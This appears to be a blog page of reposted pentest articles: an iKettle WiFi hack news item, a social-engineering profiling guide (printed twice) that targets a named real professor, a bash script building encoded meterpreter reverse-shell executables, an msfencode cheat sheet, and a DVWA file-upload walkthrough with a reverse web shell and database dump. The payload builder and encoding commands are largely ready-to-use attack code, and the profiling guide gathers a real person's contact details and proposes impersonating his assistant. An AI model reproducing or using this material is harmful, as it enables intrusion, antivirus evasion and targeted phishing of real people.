All posts by amit369

How A Researcher Hacked iKettles to Steal WiFi Passwords All Across London

 

The IoT security is much-debated topic that needs more attention in near future. It might seem convenient to connect your all home devices to the internet and track them on the move. But, it should be noted that it’s possible that your favorite home-gizmo is spilling your secrets.

For example, take the humble tea kettle boiling a nice cuppa for you. A security researcher in England has been hacking into the smart iKettles all across the country and cracking the private WiFi passwords.

“If you haven’t configured the kettle, it’s trivially easy for hackers to find your house and take over your kettle,” says Ken Munro, a researcher with Pen Test Partners.

The iKettle is actually a ‘smart’ kettle that can be turned on using a smartphone app. But, these smart kettles are reportedly ‘insecure’ if not configured properly and could cause a WiFi kettle hack.

wifi-hack-ikettle

He cracked the home WiFi passwords “easily” and explains the process of WiFi kettle hack: “Attackers will need to setup a malicious network with the same SSID but with a stronger signal that the iKettle connects to before sending a disassociation packet that will cause the device to drop its wireless link.”

So, a skillful hacker can just sit outside your home with an antenna pointed towards the home, boot the kettle off its access point and connect it to his device. Now he can easily steal your passwords in plain text to execute this WiFi kettle hack.

Munro says the security of the Internet of Thing devices is “utterly bananas” and some urgent steps are the need of the hour.

Watch the video below where the WiFi kettle hack is explained:

source: http://fossbytes.com/

Advertisements

Building Profiles for a Social Engineering Attack

The key to a successful social engineering engagement is trust.If you are able to win the trust of someone else easily then you can obtain any information you want.Also people are suspicious when they don’t know someone and they are not so open when you are going to ask for something about them or their company.However if you have done your research and you are giving them information that have valid grounds then you might be able to convince them and win their trust faster.In this article we will see how we can create a profile for someone who we don’t know.

Let’s say that our client is the MIT(Massachusetts Institute of Technology) and we don’t have any information about them.As a first step is to discover email addresses and profiles that exist on social media networks.We have two options in this step.We can use either the tool theHarvester or we can use the metasploit module calledsearch_email_collector.

The use of the email collector module of the metasploit framework is pretty simple.We just need to set the domain of our target and it will automatically search through Bing,Yahoo and Google for valid email addresses.

 

Our target in this case is the MIT so the domain that we want to set is the mit.edu.Below is a sample of our results.

 

From the other hand the tool theHarvester is providing us with more options.So except of the fact that we can scan for email addresses,we can scan also for profiles in social media like Google+ and Linkedin.In the next image you can see the command that we have executed in the tool.

 

Below is a sample of the email addresses that the tool theHarvester has discovered.Of course we can combine the results with the module of the metasploit if we wish.

 

We can try also to scan for profiles related to the mit.edu into professional social networks like Linkedin.We have discovered 2 profiles.

 

So we have a lot of email addresses and two names.Comparing the results with the metasploit module email collector we have identify that there is an email address that is probably corresponds to the Walter Lewin profile.The email address is lewin@mit.eduand you can see it in the results below.

 

Now that we have a name and an email address it is much more easier to search the web in order to collect as much information as possible about this particular person.For example we can start by checking his Linkedin profile.

 

We can use the email address lewin@mit.edu to discover his Facebook profile.

 

The information that we can retrieve without being friends on Facebook with is limited.However if we impersonate ourselves as a teacher of MIT we can send a friend request and we might be able to convince him with this way to add us to his friend list so we can have access to much more personal information.Another good tool for obtaining information is through the website pipl.com.

 

As you can see we have discovered information about the age,the job,the personal web space,his Amazon wish list and a website that contains the profile about this professor.Also from the same search we have manage to find his work phone number and his office room.

 

We can verify the above details by simply discovering his personal web page of the MIT.

 

From the above image except of the phone numbers and the addresses we have discovered also and the assistant of this professor.This can help us in many ways like:we are sending him an email pretending that it comes from his assistant.The professor will think that it came from a person that he trusts so he will respond to our questions more easily.

Basically the idea when constructing a profile of the person that you will use your social engineering skills is to have as much information as possible about his interests and activities,his friends and colleagues,emails and phone numbers etc.Keeping all that information on your notebook will help you to construct an ideal scenario that will work.

Conclusion

Exposure of personal information is an advantage for every social engineer guy.Every information that you will post on the Internet eventually it will stay forever.So before you post something personal think twice if it is really necessary to allow other people to know about my self and my activities.Also using different email addresses and usernames will make the work of social engineers much more difficult.

Disclaimer

Pentestlab appreciates highly the professor Mr. Walter Lewin and respects his work and contribution to the science and doesn’t encourage in any way his readers to use this personal information in order to perform illegal activities against this person.

SOURCE:

The key to a successful social engineering engagement is trust.If you are able to win the trust of someone else easily then you can obtain any information you want.Also people are suspicious when they don’t know someone and they are not so open when you are going to ask for something about them or their company.However if you have done your research and you are giving them information that have valid grounds then you might be able to convince them and win their trust faster.In this article we will see how we can create a profile for someone who we don’t know.

Let’s say that our client is the MIT(Massachusetts Institute of Technology) and we don’t have any information about them.As a first step is to discover email addresses and profiles that exist on social media networks.We have two options in this step.We can use either the tool theHarvester or we can use the metasploit module calledsearch_email_collector.

The use of the email collector module of the metasploit framework is pretty simple.We just need to set the domain of our target and it will automatically search through Bing,Yahoo and Google for valid email addresses.

 

Our target in this case is the MIT so the domain that we want to set is the mit.edu.Below is a sample of our results.

 

From the other hand the tool theHarvester is providing us with more options.So except of the fact that we can scan for email addresses,we can scan also for profiles in social media like Google+ and Linkedin.In the next image you can see the command that we have executed in the tool.

 

Below is a sample of the email addresses that the tool theHarvester has discovered.Of course we can combine the results with the module of the metasploit if we wish.

 

We can try also to scan for profiles related to the mit.edu into professional social networks like Linkedin.We have discovered 2 profiles.

 

So we have a lot of email addresses and two names.Comparing the results with the metasploit module email collector we have identify that there is an email address that is probably corresponds to the Walter Lewin profile.The email address is lewin@mit.eduand you can see it in the results below.

 

Now that we have a name and an email address it is much more easier to search the web in order to collect as much information as possible about this particular person.For example we can start by checking his Linkedin profile.

 

We can use the email address lewin@mit.edu to discover his Facebook profile.

 

The information that we can retrieve without being friends on Facebook with is limited.However if we impersonate ourselves as a teacher of MIT we can send a friend request and we might be able to convince him with this way to add us to his friend list so we can have access to much more personal information.Another good tool for obtaining information is through the website pipl.com.

 

As you can see we have discovered information about the age,the job,the personal web space,his Amazon wish list and a website that contains the profile about this professor.Also from the same search we have manage to find his work phone number and his office room.

 

We can verify the above details by simply discovering his personal web page of the MIT.

 

From the above image except of the phone numbers and the addresses we have discovered also and the assistant of this professor.This can help us in many ways like:we are sending him an email pretending that it comes from his assistant.The professor will think that it came from a person that he trusts so he will respond to our questions more easily.

Basically the idea when constructing a profile of the person that you will use your social engineering skills is to have as much information as possible about his interests and activities,his friends and colleagues,emails and phone numbers etc.Keeping all that information on your notebook will help you to construct an ideal scenario that will work.

Conclusion

Exposure of personal information is an advantage for every social engineer guy.Every information that you will post on the Internet eventually it will stay forever.So before you post something personal think twice if it is really necessary to allow other people to know about my self and my activities.Also using different email addresses and usernames will make the work of social engineers much more difficult.

Disclaimer

Pentestlab appreciates highly the professor Mr. Walter Lewin and respects his work and contribution to the science and doesn’t encourage in any way his readers to use this personal information in order to perform illegal activities against this person.

Create Executable Payloads Automatically

This script will create an executable file which it will listen in 3 different ports and it will be encoded with the shikata_ga_nai encoder.Of course it can be used also to create different file extensions like .vba etc automatically.You can see the source code of the script below.

Source Code:

#!/bin/bash
# Simple builder
LHOST="192.168.91.135"
LPORTS="4444 5555 6666"

rm -fr /tmp/msf.raw
rm -fr /tmp/msf1.raw
echo "Building…"
echo -n "Port: `echo $LPORTS | cut -d " " -f 1`"
echo ""
msfvenom -p windows/meterpreter/reverse_tcp -f raw -e x86/shikata_ga_nai LHOST=$LHOST LPORT=`echo $LPORTS | cut -d " " -f 1` exitfunc=thread > /tmp/msf.raw
for LPORT in `echo $LPORTS`
do
echo -n "Port: $LPORT"
echo ""
msfvenom -p windows/meterpreter/reverse_tcp -f raw -e x86/shikata_ga_nai LHOST=$LHOST LPORT=$LPORT exitfunc=thread -c /tmp/msf.raw > /tmp/msf1.raw
cp /tmp/msf1.raw /tmp/msf.raw
done
# Change option –f exe to –f vba in order to create a vba file
msfvenom -p windows/meterpreter/reverse_tcp -f exe -e x86/shikata_ga_nai LHOST=$LHOST LPORT=$LPORT exitfunc=thread -c /tmp/msf1.raw > msf.exe
rm -fr /tmp/msf.raw
rm -fr /tmp/msf1.raw
echo -n "Done!"

Original Author: Michele

First posted here

SOURCE: https://pentestlab.wordpress.com

MSFencode Commands

msfencode -h

Display the help file of msfencode

msfencode -l

Lists the available encoders

msfencode -t (c, elf, exe, java, js_le, js_be, perl, raw, ruby, vba, vbs, loop-vbs, asp, war, macho)

Format to display the encoded buffer

msfencode -i payload.raw -o encoded_payload.exe -e x86/shikata_ga_nai -c 5 -t exe

Uses the shikata_ga_nai encoder to encode the payload.raw 5 times and exports it to a file called encoded_payload.exe

msfpayload windows/meterpreter/bind_tcp LPORT=443 R | msfencode -e x86/_countdown -c 5 -t raw | msfencode -e x86/shikata_ga_nai -c 5 -t exe -o multi-encoded_payload.exe

Creation of a multi-encoded payload

msfencode -i payload.raw BufferRegister=ESI -e x86/alpha_mixed -t c

Create pure alphanumeric shellcode where ESI points to the shellcode;output in C-style notation

Reference:

From the book Metasploit – The Penetration Testers Guide

File Upload Exploitation

File upload vulnerabilities consists a major threat for web applications.A penetration tester can use a file upload form in order to upload different types of files that will allow him to obtain information about the web server or even a shell.Of course shell is always a goal but a good penetration tester must not stop there.Further activities can be performed after the shell.The focus of these activities must be on the database.In this article we will see how we can obtain a shell from the exploitation of file upload on a Linux web server and how we can dump the database that is running on the system.

Backtrack includes a variety of web shells for different technologies like PHP,ASP etc.In our example we will use the damn vulnerable web application which is written in PHP in order to attack the web server through the file upload.The web shell that we will use in our case it will be the php-reverse-shell.

uploading the web shell

 

Now we have to set our machine to listen on the same port as our web shell.We can do this with netcat and the command nc -lvp 4444.The next step is to go back to the web application and to try to access the URL that the PHP reverse shell exists.We will notice that it will return a shell to our console:

Obtaining a shell

 

So we have compromise the remote web server and we can execute further commands from our shell-like a simple ls in order to discover directories.

Listing Directories

 

Now it is time to dump the database.We will have to go to the directory with the name uploads because this directory has write permissions and it is visible to the outside world which means that we can access it and we can create a file.Then we can use the following command in order to dump the database to a file.

mysqldump -u root -p dvwa > hacked_db.sql

We already know that the user root exists because it is already logged into the system.Also it is very common the name of the application or of the company to be the database name so we will use the dvwa.The > sign will create a file inside the uploads directory with the name hacked_db.sql.

Dumping the database to a file

 

As we can see from the image above we had to provide a password.In this scenario we just pressed enter without submitting anything.In a real world penetration test it would be much more difficult however it is always a good practice to try some of the common passwords.The next two images are showing the dump of the dvwa database.

Dump of DVWA database

 

Dump of DVWA database 2

 

From the last image we can see that we even obtain the password hash of the admin which it can be cracked by using a tool like john the ripper.This is also important as we may want to have the admin privileges and into the application.

Conclusion 

In this article we saw how we can obtain a shell by exploiting a file upload form of an application and how we can dump the database.Of course in a real world scenario it is more likely restrictions to be in place but it good to know the methodology and the technique that we must follow once we have managed to upload our web shell.

Source: https://pentestlab.wordpress.com